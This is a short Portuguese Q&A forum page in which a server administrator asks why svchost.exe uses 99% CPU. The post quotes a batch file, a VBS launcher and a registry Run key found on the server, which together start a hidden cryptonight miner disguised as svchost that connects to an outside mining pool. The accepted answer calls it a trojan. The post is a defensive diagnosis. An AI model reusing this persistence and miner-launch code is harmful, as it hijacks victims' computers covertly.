Host SVC consumindo 99% da CPU

Question

Host SVC consumindo 99% da CPU

#1 resposta do (3 votos)

1

Nosso servidor está constantemente consumindo muita CPU, com svchost.exe parece ser o culpado.

Veja o screenhow abaixo:

Conteúdodoarquivode1.bat:

svchost-acryptonight-ostratum+tcp://xmr.prohash.net:7777-u4AyP2DqMQ---SomeLongCodeHere---ZFnqXUrf-px

Conteúdodoarquivodepubwin.reg:

WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Tomcat"="C:\Windows\system\pubwin.vbs"

Conteúdo do arquivo de pubwin.vbs :

dim objShell
set objShell=wscript.createObject("WScript.Shell")
WScript.Sleep(20000)
iReturnCode=objShell.Run("""C:\Windows\system\svchost.exe""  -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2Dq----SomeLongCodeHere---zdLZGeEQqZTZeBLuSNnqXUrf -p x",vbhide)

Devemos estar preocupados, ou é realmente **Tomcat** .

windows-server-2008-r2 svchost

por user3141985 05.10.2015 / 17:53

1 resposta

Tags windows-server-2008-r2 svchost

Alguma vantagem de ter Raid0 com drive único? O HDD externo está alojado ou personalizado?

score 3 · Accepted Answer

É um vírus / trojan:

link

Muitas variantes dele, é basicamente um daemon de mineração de bitcoin rebadged para se parecer com parte do sistema.